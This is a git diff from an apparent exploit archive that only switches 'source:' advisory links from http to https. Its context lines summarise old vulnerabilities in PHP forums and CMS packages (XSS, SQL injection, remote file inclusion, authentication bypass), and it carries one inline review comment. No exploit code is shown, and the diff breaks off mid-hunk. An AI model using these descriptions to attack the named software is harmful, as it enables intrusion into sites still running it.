https://www.securityfocus.com/bid/4819/info OpenBB is web forum software written in PHP. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21478.txt b/exploits/php/webapps/21478.txt index 9918ba472..07d5f4a78 100644 --- a/exploits/php/webapps/21478.txt +++ b/exploits/php/webapps/21478.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4823/info +source: https://www.securityfocus.com/bid/4823/info OpenBB is web forum software written in PHP. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21479.txt b/exploits/php/webapps/21479.txt index 258a87e30..f8da0e046 100644 --- a/exploits/php/webapps/21479.txt +++ b/exploits/php/webapps/21479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4824/info +source: https://www.securityfocus.com/bid/4824/info OpenBB is web forum software written in PHP. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21486.txt b/exploits/php/webapps/21486.txt index 4c60c322c..71936af56 100644 --- a/exploits/php/webapps/21486.txt +++ b/exploits/php/webapps/21486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4858/info +source: https://www.securityfocus.com/bid/4858/info It is possible to inject arbitrary HTML into phpBB2 forum messages via the use of BBCode image tags. A similar issue is described in Bugtraq ID 4379 "PHPBB Image Tag User-Embedded Scripting Vulnerability". However, phpBB2 was found to not be vulnerable to this previous issue. diff --git a/exploits/php/webapps/21509.txt b/exploits/php/webapps/21509.txt index a6d1f6d2a..d83b60974 100644 --- a/exploits/php/webapps/21509.txt +++ b/exploits/php/webapps/21509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4924/info +source: https://www.securityfocus.com/bid/4924/info Teekai's Tracking Online does not adequately filter HTML tags from certain URL parameters, making it prone to cross-site scripting attacks. Attackers may exploit this by creating a malicious link to a vulnerable webpage. diff --git a/exploits/php/webapps/21514.txt b/exploits/php/webapps/21514.txt index c99289dbf..538c35766 100644 --- a/exploits/php/webapps/21514.txt 
+++ b/exploits/php/webapps/21514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4953/info +source: https://www.securityfocus.com/bid/4953/info Splatt Forum does not filter HTML from image tags. This may allow an attacker to inject arbitrary script code in forum messages. Injected script code will be executed in the browser of an arbitrary web user who views the malicious forum message, in the context of the website running Splatt Forum. diff --git a/exploits/php/webapps/21517.txt b/exploits/php/webapps/21517.txt index 268d866ba..52622f87a 100644 --- a/exploits/php/webapps/21517.txt +++ b/exploits/php/webapps/21517.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4957/info +source: https://www.securityfocus.com/bid/4957/info It has been reported that multiple vulnerabilities exist in CBMS. Reportedly, it is possible to inject both JavaScript and SQL code into the system. It may be possible to execute script code within the context of the site as an authenticated administrator, or to view or modify sensitive database information through the subversion of an SQL query. diff --git a/exploits/php/webapps/21519.txt b/exploits/php/webapps/21519.txt index 7b6a98f86..d40c89a56 100644 --- a/exploits/php/webapps/21519.txt +++ b/exploits/php/webapps/21519.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4967/info +source: https://www.securityfocus.com/bid/4967/info It has been reported that MyHelpDesk is vulnerable to HTML injection attacks. diff --git a/exploits/php/webapps/21525.txt b/exploits/php/webapps/21525.txt index 1ba9d5c79..48781cc64 100644 --- a/exploits/php/webapps/21525.txt +++ b/exploits/php/webapps/21525.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4969/info +source: https://www.securityfocus.com/bid/4969/info Geeklog does not filter script code from URL parameters, making it prone to cross-site scripting attacks. Attacker-supplied script code may be included in a malicious link to the 'index.php' or 'comment.php' script. Such a malicious link might be included in a HTML e-mail or on a malicious webpage. diff --git a/exploits/php/webapps/21526.txt b/exploits/php/webapps/21526.txt index 25907435f..7fb16de5f 100644 --- a/exploits/php/webapps/21526.txt +++ b/exploits/php/webapps/21526.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4970/info +source: https://www.securityfocus.com/bid/4970/info It is reported that MyHelpDesk is vulnerable to cross-site scripting attacks. diff --git a/exploits/php/webapps/21527.txt b/exploits/php/webapps/21527.txt index d2f0f81d2..e35045c44 100644 --- a/exploits/php/webapps/21527.txt +++ b/exploits/php/webapps/21527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4971/info +source: https://www.securityfocus.com/bid/4971/info It is reported that MyHelpDesk (version 20020509 and earlier) are vulnerable to SQL injection attacks. diff --git a/exploits/php/webapps/21528.txt b/exploits/php/webapps/21528.txt index 801968d71..5d475bcea 100644 --- a/exploits/php/webapps/21528.txt +++ b/exploits/php/webapps/21528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4974/info +source: https://www.securityfocus.com/bid/4974/info Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks. diff --git a/exploits/php/webapps/21529.txt b/exploits/php/webapps/21529.txt index 3bfae4507..1efbea48f 100644 --- a/exploits/php/webapps/21529.txt +++ b/exploits/php/webapps/21529.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4977/info +source: https://www.securityfocus.com/bid/4977/info W-Agora is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. In particular, the 'inc_dir' variable found in a number of the W-Agora scripts defines the path to the configuration file. It is possible, under some configurations, for an attacker to specify an arbitrary value for the location of the configuration file which points to a file on a remote server. diff --git a/exploits/php/webapps/21552.txt b/exploits/php/webapps/21552.txt index c1567623a..b41316381 100644 --- a/exploits/php/webapps/21552.txt +++ b/exploits/php/webapps/21552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5022/info +source: https://www.securityfocus.com/bid/5022/info PHP Classifieds has been reported to be prone to cross-site scripting attacks. Attackers may inject arbitrary HTML or script code into URI parameters in a malicious link. When the malicious link is visited, the attacker's script code will be executed in the web client of the user browsing the link, in the security context of the website hosting the vulnerable software. diff --git a/exploits/php/webapps/21557.txt b/exploits/php/webapps/21557.txt index 9dab890c7..54598ae41 100644 --- a/exploits/php/webapps/21557.txt +++ b/exploits/php/webapps/21557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5028/info +source: https://www.securityfocus.com/bid/5028/info Zeroboard is a PHP web board package available for the Linux and Unix platforms. diff --git a/exploits/php/webapps/21563.txt b/exploits/php/webapps/21563.txt index b325878e7..af963fa7e 100644 --- a/exploits/php/webapps/21563.txt +++ b/exploits/php/webapps/21563.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5037/info +source: https://www.securityfocus.com/bid/5037/info osCommerce is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. diff --git a/exploits/php/webapps/21564.txt b/exploits/php/webapps/21564.txt index 2a7acf6d5..6d23abc98 100644 --- a/exploits/php/webapps/21564.txt +++ b/exploits/php/webapps/21564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5039/info +source: https://www.securityfocus.com/bid/5039/info PHP-Address is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. diff --git a/exploits/php/webapps/21570.txt b/exploits/php/webapps/21570.txt index 92546b7f9..d4a8ba39f 100644 --- a/exploits/php/webapps/21570.txt +++ b/exploits/php/webapps/21570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5060/info +source: https://www.securityfocus.com/bid/5060/info BasiliX is a web-based mail application. It offers features such as mail attachments, address book, multiple language and theme support. diff --git a/exploits/php/webapps/21590.txt b/exploits/php/webapps/21590.txt index cd8909d1c..85af67fa8 100644 --- a/exploits/php/webapps/21590.txt +++ b/exploits/php/webapps/21590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5141/info +source: https://www.securityfocus.com/bid/5141/info PhpAuction is a freely available web-based auction system. It is written using PHP scripting language on a MySQL database engine. diff --git a/exploits/php/webapps/21610.txt b/exploits/php/webapps/21610.txt index 3f0e80675..764d4fd8d 100644 --- a/exploits/php/webapps/21610.txt +++ b/exploits/php/webapps/21610.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5209/info +source: https://www.securityfocus.com/bid/5209/info Sun i-Runbook is a single point of technical and administration management for Sun production environments. i-Runbook provides a web interface. diff --git a/exploits/php/webapps/21622.txt b/exploits/php/webapps/21622.txt index 3be9dda9e..e4c4dcc08 100644 --- a/exploits/php/webapps/21622.txt +++ b/exploits/php/webapps/21622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5254/info +source: https://www.securityfocus.com/bid/5254/info PHP-Wiki does not sufficiently sanitize HTML from URI parameters, making it prone to cross-site scripting attacks. An attacker may exploit this condition by enticing users to visit a malicious link which contains attacker-supplied script code. diff --git a/exploits/php/webapps/21628.txt b/exploits/php/webapps/21628.txt index 80d7d5ed6..47e122056 100644 --- a/exploits/php/webapps/21628.txt +++ b/exploits/php/webapps/21628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5270/info +source: https://www.securityfocus.com/bid/5270/info A cross site scripting vulnerability has been reported for Geeklog. Reportedly, Geeklog does not properly sanitize user supplied input before being included when posting comments or writing stories. diff --git a/exploits/php/webapps/21640.txt b/exploits/php/webapps/21640.txt index dd00924b8..f2a21030b 100644 --- a/exploits/php/webapps/21640.txt +++ b/exploits/php/webapps/21640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5297/info +source: https://www.securityfocus.com/bid/5297/info A vulnerability has been reported for Cobalt Qube that may allow an attacker to bypass the authentication mechanism and obtain administrative privileges. diff --git a/exploits/php/webapps/21660.txt b/exploits/php/webapps/21660.txt index fcb3e1a9d..77301e75e 100644 --- a/exploits/php/webapps/21660.txt +++ b/exploits/php/webapps/21660.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5342/info +source: https://www.securityfocus.com/bid/5342/info phpBB2 is an open-source web forum application that is written in PHP and backended by a number of database products. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21661.txt b/exploits/php/webapps/21661.txt index 055030602..16fc7f218 100644 --- a/exploits/php/webapps/21661.txt +++ b/exploits/php/webapps/21661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5347/info +source: https://www.securityfocus.com/bid/5347/info dotproject is prone to an issue which may allow remote attackers to bypass authentication and gain administrative access to the software. diff --git a/exploits/php/webapps/21668.txt b/exploits/php/webapps/21668.txt index 90ba4b5c7..dba683dd0 100644 --- a/exploits/php/webapps/21668.txt +++ b/exploits/php/webapps/21668.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5354/info +source: https://www.securityfocus.com/bid/5354/info shoutBOX does not sufficiently sanitize HTML tags from input supplied via form fields. Attackers may exploit this lack of input validation to inject arbitrary HTML and script code into pages that are generated by the script. This may result in execution of attacker-supplied code in the web client of a user who visits such a page. HTML and script code will be executed in the security context of the site hosting the software. diff --git a/exploits/php/webapps/21676.txt b/exploits/php/webapps/21676.txt index 6285ede02..65d32e123 100644 --- a/exploits/php/webapps/21676.txt +++ b/exploits/php/webapps/21676.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5375/info +source: https://www.securityfocus.com/bid/5375/info Gallery is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Gallery. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'GALLERY_BASEDIR' parameter. diff --git a/exploits/php/webapps/21708.txt b/exploits/php/webapps/21708.txt index 2ce25ee0e..ea054c811 100644 --- a/exploits/php/webapps/21708.txt +++ b/exploits/php/webapps/21708.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5468/info +source: https://www.securityfocus.com/bid/5468/info Reportedly, L-Forum is vulnerable to SQL injection attacks. The vulnerability lies in the file 'search.php' diff --git a/exploits/php/webapps/21723.txt b/exploits/php/webapps/21723.txt index 37fd445f3..d85cae80c 100644 --- a/exploits/php/webapps/21723.txt +++ b/exploits/php/webapps/21723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5501/info +source: https://www.securityfocus.com/bid/5501/info Reportedly, FUDForum may disclose contents of arbitrary files to attackers. The vulnerability is the result of FUDForum failing to check the path of the file that is being requested. By simply making malicious requests via URI parameters, an attacker is able to obtain access to potentially sensitive files. diff --git a/exploits/php/webapps/21724.txt b/exploits/php/webapps/21724.txt index 2da79f407..b1c2c98af 100644 --- a/exploits/php/webapps/21724.txt +++ b/exploits/php/webapps/21724.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5502/info +source: https://www.securityfocus.com/bid/5502/info Reportedly, it is possible for an administrator to manipulate (create, modify etc.) files outside of the FUDForum directories. This vulnerability is present in the 'adm/admbrowse.php' script. The vulnerability is the result of FUDForum allowing access to files and directories outside of FUDForum directories. diff --git a/exploits/php/webapps/21727.txt b/exploits/php/webapps/21727.txt index 763ff93ce..85a9d06d6 100644 --- a/exploits/php/webapps/21727.txt +++ b/exploits/php/webapps/21727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5504/info +source: https://www.securityfocus.com/bid/5504/info Mantis depends on include files to provide some functionality, such as dynamic generation of graphs. However, since Mantis does not properly validate the path to the include file, it is possible for attackers to specify an arbitrary path, either to a local file or a file on a remote server. diff --git a/exploits/php/webapps/21745.txt b/exploits/php/webapps/21745.txt index a1acbdc1d..00401733f 100644 --- a/exploits/php/webapps/21745.txt +++ b/exploits/php/webapps/21745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5552/info +source: https://www.securityfocus.com/bid/5552/info Achievo includes a PHP script which is used to generate JavaScript (class.atkdateattribute.js.php). This script employs a number of PHP include_once() statements to call code contained in function libraries and grab configuration information. Attackers may subvert the variable ($config_atkroot) which is used to store the location of the external files and specify an arbitrary location, such as an attacker-supplied PHP script on a remote host. diff --git a/exploits/php/webapps/21755.txt b/exploits/php/webapps/21755.txt index 75b0b313c..aff543d44 100644 --- a/exploits/php/webapps/21755.txt +++ b/exploits/php/webapps/21755.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5569/info +source: https://www.securityfocus.com/bid/5569/info php(Reactor) does not sufficiently sanitize HTML from various fields (such as in the body of a message or in profile fields). It is possible to inject arbitrary HTML and script code into these fields. diff --git a/exploits/php/webapps/21776.txt b/exploits/php/webapps/21776.txt index 4a00eb52d..1a2ff88f1 100644 --- a/exploits/php/webapps/21776.txt +++ b/exploits/php/webapps/21776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5669/info +source: https://www.securityfocus.com/bid/5669/info PHP is a freely available, open source web scripting language package. It is available for Microsoft Windows, Linux, and Unix operating systems. diff --git a/exploits/php/webapps/21778.txt b/exploits/php/webapps/21778.txt index 6567424e6..78adea55b 100644 --- a/exploits/php/webapps/21778.txt +++ b/exploits/php/webapps/21778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5673/info +source: https://www.securityfocus.com/bid/5673/info phpGB is vulnerable to a SQL injection vulnerability. diff --git a/exploits/php/webapps/21779.txt b/exploits/php/webapps/21779.txt index 83d286e7c..4cc24fe01 100644 --- a/exploits/php/webapps/21779.txt +++ b/exploits/php/webapps/21779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5675/info +source: https://www.securityfocus.com/bid/5675/info WoltLab is prone to SQL injection attacks. This is due to insufficient sanitization of parameters handled by the board.php script, which may be supplied externally via the query string in a web request. diff --git a/exploits/php/webapps/21780.txt b/exploits/php/webapps/21780.txt index ed605ee21..bb1ee170b 100644 --- a/exploits/php/webapps/21780.txt +++ b/exploits/php/webapps/21780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5676/info +source: https://www.securityfocus.com/bid/5676/info phpGB is subject to HTML injection attacks. 
diff --git a/exploits/php/webapps/21783.txt b/exploits/php/webapps/21783.txt index 00bebe288..b53c92fb2 100644 --- a/exploits/php/webapps/21783.txt +++ b/exploits/php/webapps/21783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5679/info +source: https://www.securityfocus.com/bid/5679/info phpGB is subject to a PHP code injection vulnerability. diff --git a/exploits/php/webapps/21811.txt b/exploits/php/webapps/21811.txt index f44ab016b..b34e4a9ca 100644 --- a/exploits/php/webapps/21811.txt +++ b/exploits/php/webapps/21811.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5763/info +source: https://www.securityfocus.com/bid/5763/info SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems. diff --git a/exploits/php/webapps/21817.txt b/exploits/php/webapps/21817.txt index 3d7f21292..0e0f6fd0a 100644 --- a/exploits/php/webapps/21817.txt +++ b/exploits/php/webapps/21817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5771/info +source: https://www.securityfocus.com/bid/5771/info Problems with JAWMail could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21825.txt b/exploits/php/webapps/21825.txt index f7309e000..5a15a0136 100644 --- a/exploits/php/webapps/21825.txt +++ b/exploits/php/webapps/21825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5779/info +source: https://www.securityfocus.com/bid/5779/info A vulnerability has been discovered in phpWebsite which allows an attacker to remotely include a malicious PHP file. It is possible for an attacker to specify a remote location for phpWebsite to download an attacker-supplied htmlheader.php script. diff --git a/exploits/php/webapps/21829.txt b/exploits/php/webapps/21829.txt index bd7de9022..61f8eb680 100644 --- a/exploits/php/webapps/21829.txt +++ b/exploits/php/webapps/21829.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5785/info +source: https://www.securityfocus.com/bid/5785/info Problems with XOOPS could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21855.txt b/exploits/php/webapps/21855.txt index 31c018933..f24eccbfd 100644 --- a/exploits/php/webapps/21855.txt +++ b/exploits/php/webapps/21855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5788/info +source: https://www.securityfocus.com/bid/5788/info PHPNuke 6.0 is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/21859.txt b/exploits/php/webapps/21859.txt index d4a11ddc4..f7aa045d9 100644 --- a/exploits/php/webapps/21859.txt +++ b/exploits/php/webapps/21859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5796/info +source: https://www.securityfocus.com/bid/5796/info Problems with PHPNuke could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21860.txt b/exploits/php/webapps/21860.txt index 596aa51a2..bdd7229d7 100644 --- a/exploits/php/webapps/21860.txt +++ b/exploits/php/webapps/21860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5797/info +source: https://www.securityfocus.com/bid/5797/info Problems with NPDS could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21861.txt b/exploits/php/webapps/21861.txt index 58c9ed9a5..cd0b42e17 100644 --- a/exploits/php/webapps/21861.txt +++ b/exploits/php/webapps/21861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5798/info +source: https://www.securityfocus.com/bid/5798/info Problems with DaCode could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21862.txt b/exploits/php/webapps/21862.txt index a6aca91dc..a1d719155 100644 --- a/exploits/php/webapps/21862.txt +++ b/exploits/php/webapps/21862.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5799/info +source: https://www.securityfocus.com/bid/5799/info A SQL injection vulnerability has been discovered in PHPNuke. diff --git a/exploits/php/webapps/21863.txt b/exploits/php/webapps/21863.txt index 93db4983a..9b9285006 100644 --- a/exploits/php/webapps/21863.txt +++ b/exploits/php/webapps/21863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5801/info +source: https://www.securityfocus.com/bid/5801/info Problems with Drupal could allow an attacker to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21864.txt b/exploits/php/webapps/21864.txt index fece63288..e2b043c63 100644 --- a/exploits/php/webapps/21864.txt +++ b/exploits/php/webapps/21864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5802/info +source: https://www.securityfocus.com/bid/5802/info Problems with phpWebSite could make it possible to execute arbitrary script code in a vulnerable client. diff --git a/exploits/php/webapps/21873.txt b/exploits/php/webapps/21873.txt index cca08d8f9..0a359b52e 100644 --- a/exploits/php/webapps/21873.txt +++ b/exploits/php/webapps/21873.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5809/info +source: https://www.securityfocus.com/bid/5809/info A cross site scripting vulnerability has been reported for PostNuke. diff --git a/exploits/php/webapps/21874.txt b/exploits/php/webapps/21874.txt index 8d639f650..25017151c 100644 --- a/exploits/php/webapps/21874.txt +++ b/exploits/php/webapps/21874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5820/info +source: https://www.securityfocus.com/bid/5820/info A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. diff --git a/exploits/php/webapps/21886.txt b/exploits/php/webapps/21886.txt index 90eb41a3d..717a813ae 100644 
--- a/exploits/php/webapps/21886.txt +++ b/exploits/php/webapps/21886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5849/info +source: https://www.securityfocus.com/bid/5849/info A vulnerability has been reported for Py-Membres 3.1 that allows remote attackers to obtain administrative privileges on vulnerable installations. diff --git a/exploits/php/webapps/21893.php b/exploits/php/webapps/21893.php index 0016e847a..8906f001b 100644 --- a/exploits/php/webapps/21893.php +++ b/exploits/php/webapps/21893.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5850/info +source: https://www.securityfocus.com/bid/5850/info TightAuction is prone to an information disclosure vulnerability. The configuration file (config.inc) contains sensitive information such as database authentication credentials. It is possible for remote attackers to retrieve this file via a web request, and since the file does not have the correct extension (.inc.php) the contents will be rendered in a web browser instead of interpreted. diff --git a/exploits/php/webapps/21894.txt b/exploits/php/webapps/21894.txt index 1f7cdba60..8b633da6c 100644 --- a/exploits/php/webapps/21894.txt +++ b/exploits/php/webapps/21894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5851/info +source: https://www.securityfocus.com/bid/5851/info A problem with the default installation of Midicart PHP may make it possible for remote users to gain access to sensitive information. diff --git a/exploits/php/webapps/21896.txt b/exploits/php/webapps/21896.txt index 64a164f09..ac44e4270 100644 --- a/exploits/php/webapps/21896.txt +++ b/exploits/php/webapps/21896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5855/info +source: https://www.securityfocus.com/bid/5855/info A problem with the default installation of Midicart PHP may make it possible for remote users to gain access to sensitive information. 
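Review bot: In 21893.php the rewritten `source:` line is line 1 of a `.php` file and is followed directly by the plain-text description, so the header sits outside any comment or PHP block and would be emitted verbatim if the file were ever interpreted. Since this pass already edits that line, consider wrapping the header in a comment, and apply the same treatment to the other `.php` entries touched here (22030.php, 22042.php).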
diff --git a/exploits/php/webapps/21899.txt b/exploits/php/webapps/21899.txt index 324a98a0c..92222fe21 100644 --- a/exploits/php/webapps/21899.txt +++ b/exploits/php/webapps/21899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5864/info +source: https://www.securityfocus.com/bid/5864/info phpWebSite is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/21900.txt b/exploits/php/webapps/21900.txt index dfbe41f92..f61f0ee29 100644 --- a/exploits/php/webapps/21900.txt +++ b/exploits/php/webapps/21900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5865/info +source: https://www.securityfocus.com/bid/5865/info MySimpleNews allows users to enter news articles through a web interface. It will allow PHP code to be injected into URI parameters of the 'users.php' script, which will be stored into a MySimpleNews file (news.php3). The injected code may then be executed by the attacker by requesting the 'news.php3' script. diff --git a/exploits/php/webapps/21901.txt b/exploits/php/webapps/21901.txt index 1e9fa061a..825a5e295 100644 --- a/exploits/php/webapps/21901.txt +++ b/exploits/php/webapps/21901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5866/info +source: https://www.securityfocus.com/bid/5866/info MySimpleNews stores the administrative password in clear text in a remotely viewable HTML file. diff --git a/exploits/php/webapps/21903.txt b/exploits/php/webapps/21903.txt index 2528ec7ff..47fb581a0 100644 --- a/exploits/php/webapps/21903.txt +++ b/exploits/php/webapps/21903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5882/info +source: https://www.securityfocus.com/bid/5882/info Books is a module written for PostNuke. Reportedly, Books is prone to cross site scripting attacks. diff --git a/exploits/php/webapps/21905.txt b/exploits/php/webapps/21905.txt index 93cccbb79..29324c252 100644 --- a/exploits/php/webapps/21905.txt +++ b/exploits/php/webapps/21905.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5886/info +source: https://www.securityfocus.com/bid/5886/info A vulnerability has been discovered in phpMyNewsLetter. diff --git a/exploits/php/webapps/21906.txt b/exploits/php/webapps/21906.txt index d98a76fe4..3537549f5 100644 --- a/exploits/php/webapps/21906.txt +++ b/exploits/php/webapps/21906.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5890/info +source: https://www.securityfocus.com/bid/5890/info Reportedly, phpLinkat is prone to cross site scripting attacks. diff --git a/exploits/php/webapps/21912.txt b/exploits/php/webapps/21912.txt index c1956f91e..2be4197a8 100644 --- a/exploits/php/webapps/21912.txt +++ b/exploits/php/webapps/21912.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5905/info +source: https://www.securityfocus.com/bid/5905/info The Killer Protection PHP script is prone to an information-disclosure issue. Reportedly, unauthorized users can access sensitive user data by requesting the 'vars.inc' file in a malicious HTTP request. diff --git a/exploits/php/webapps/21918.html b/exploits/php/webapps/21918.html index c641296eb..c1f6df3c0 100644 --- a/exploits/php/webapps/21918.html +++ b/exploits/php/webapps/21918.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5919/info +source: https://www.securityfocus.com/bid/5919/info A SQL injection vulnerability has been discovered in VBZoom v1.01. diff --git a/exploits/php/webapps/21921.txt b/exploits/php/webapps/21921.txt index 303c23779..20c59e3f2 100644 --- a/exploits/php/webapps/21921.txt +++ b/exploits/php/webapps/21921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5926/info +source: https://www.securityfocus.com/bid/5926/info It has been reported that VBZoom 1.01 may allow attackers to upload arbitrary files to a vulnerable system. diff --git a/exploits/php/webapps/21930.txt b/exploits/php/webapps/21930.txt index 92cc77bdb..e5586d699 100644 --- a/exploits/php/webapps/21930.txt 
+++ b/exploits/php/webapps/21930.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5939/info +source: https://www.securityfocus.com/bid/5939/info php(Reactor) is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/21931.txt b/exploits/php/webapps/21931.txt index 917842d25..6ef136d66 100644 --- a/exploits/php/webapps/21931.txt +++ b/exploits/php/webapps/21931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5942/info +source: https://www.securityfocus.com/bid/5942/info phpBBmod ships with a sample script (phpinfo.php) that may disclosure sensitive information to remote attackers. When this script is accessed, sensitive information about the underlying environment will be revealed. diff --git a/exploits/php/webapps/21933.txt b/exploits/php/webapps/21933.txt index db335c64e..98c78c009 100644 --- a/exploits/php/webapps/21933.txt +++ b/exploits/php/webapps/21933.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5945/info +source: https://www.securityfocus.com/bid/5945/info phpRank is a freely available web site link sharing script. It is available for Unix, Linux, and Microsoft operating systems. diff --git a/exploits/php/webapps/21950.txt b/exploits/php/webapps/21950.txt index dfcb7db86..b4cfd81a8 100644 --- a/exploits/php/webapps/21950.txt +++ b/exploits/php/webapps/21950.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6004/info +source: https://www.securityfocus.com/bid/6004/info A cross-site scripting vulnerability has been reported in the YaBB (Yet Another Bulletin Board) forum login script. HTML tags or script code are not sanitized from the error output of erroneous login attempts. diff --git a/exploits/php/webapps/21956.txt b/exploits/php/webapps/21956.txt index 309d6db30..42fc2dc8b 100644 --- a/exploits/php/webapps/21956.txt +++ b/exploits/php/webapps/21956.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6013/info +source: https://www.securityfocus.com/bid/6013/info kmMail does not sufficiently sanitize HTML and script code from the body of e-mail messages. As a result, an attacker may send a malicious message to a user of kmMail that includes arbitrary HTML and script code. diff --git a/exploits/php/webapps/21957.txt b/exploits/php/webapps/21957.txt index 0be0129dd..02359fd49 100644 --- a/exploits/php/webapps/21957.txt +++ b/exploits/php/webapps/21957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6018/info +source: https://www.securityfocus.com/bid/6018/info PHP Arena paFileDB is prone to cross-site scripting attacks. diff --git a/exploits/php/webapps/21960.txt b/exploits/php/webapps/21960.txt index 413c30053..2869090b7 100644 --- a/exploits/php/webapps/21960.txt +++ b/exploits/php/webapps/21960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6033/info +source: https://www.securityfocus.com/bid/6033/info A vulnerability has been discovered in gBook v1.4. diff --git 